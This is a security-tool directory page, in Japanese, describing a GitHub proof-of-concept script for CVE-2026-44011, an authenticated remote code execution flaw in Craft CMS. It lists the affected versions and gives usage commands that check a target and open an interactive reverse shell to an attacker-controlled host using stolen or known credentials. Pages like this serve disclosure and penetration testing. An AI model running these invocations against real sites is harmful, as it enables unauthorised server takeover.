Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-44011-poc — 認証済みCraft CMS RCEのPoC(CVE-2026-44011) | Kitploit
ツール/GitHubGitHub/dennisdgr/cve-2026-44011-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトウェブセキュリティペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubdennisdgr/cve-2026-44011-poc

CVE-2026-44011-poc

認証済みCraft CMS RCEのPoC(CVE-2026-44011)

リポジトリを見る
43日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-44011: Craft CMS 認証済み RCE PoC

この Python スクリプトは、Craft CMS セキュリティアドバイザリで説明されている攻撃を応用したものです。認証済みの Craft ユーザーは、脆弱なフィールドレイアウト設定パスに到達し、サーバーにコマンドを実行させることができます。

対象範囲と要件

影響を受けるバージョンは Craft CMS >=4.0.0, <4.17.12 および >=5.0.0, <5.9.18 です。

このスクリプトは両方のホストで curl を必要とします。サーバー上では Bash を使用します。サーバー上の Python3 も対話型 PTY を提供しますが、これがない場合、シェルは基本的な接続にフォールバックします。

使用方法

# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check

# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'

クレジット

Craft CMS は @precicom-vincent-tl を CVE-2026-44011 の発見者としてクレジットしています。脆弱性の詳細とペイロード例は Craft CMS アドバイザリ GHSA-qrgm-p9w5-rrfw で公開されています。このスクリプトは、その公開された手法を応用したものです。

ツールをダウンロード